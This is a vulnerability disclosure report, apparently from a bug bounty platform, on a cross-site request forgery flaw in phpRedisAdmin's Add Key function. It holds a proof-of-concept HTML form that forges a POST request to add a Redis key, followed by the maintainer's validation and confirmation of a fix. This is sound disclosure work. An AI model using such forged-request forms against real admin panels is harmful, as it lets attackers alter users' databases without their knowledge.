Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin


Reported on

Aug 23rd 2021

✍️ Description

The Add Key functionality in the Application is vulnerable to CSRF attack.

🕵️‍♂️ Proof of Concept

<script>history.pushState('', '', '/')</script>
<form action="https://domain.tld/phpRedisAdmin/edit.php?view&s=1&d=0&key=testkey1" method="POST">
<input type="hidden" name="type" value="string" />
<input type="hidden" name="key" value="testkey13" />
<input type="hidden" name="hkey" value="" />
<input type="hidden" name="index" value="" />
<input type="hidden" name="score" value="" />
<input type="hidden" name="value" value="testval1" />
<input type="hidden" name="oldvalue" value="" />
<input type="submit" value="Submit request" />

💥 Impact

This vulnerability can let an attacker add data to the database without the knowledge/interaction of the user. 📍 Location index.php#L1 📝 References Cross-site request forgery (CSRF)


Melbin Mathew Antony modified the report
a year ago
We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back a year ago
a year ago

Fixed in

a year ago


Hi, please mark the vulnerability as validated and fixed. Thanks

Erik Dubbelboer validated this vulnerability a year ago
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
Erik Dubbelboer confirmed that a fix has been merged on b9039a a year ago
The fix bounty has been dropped
to join this conversation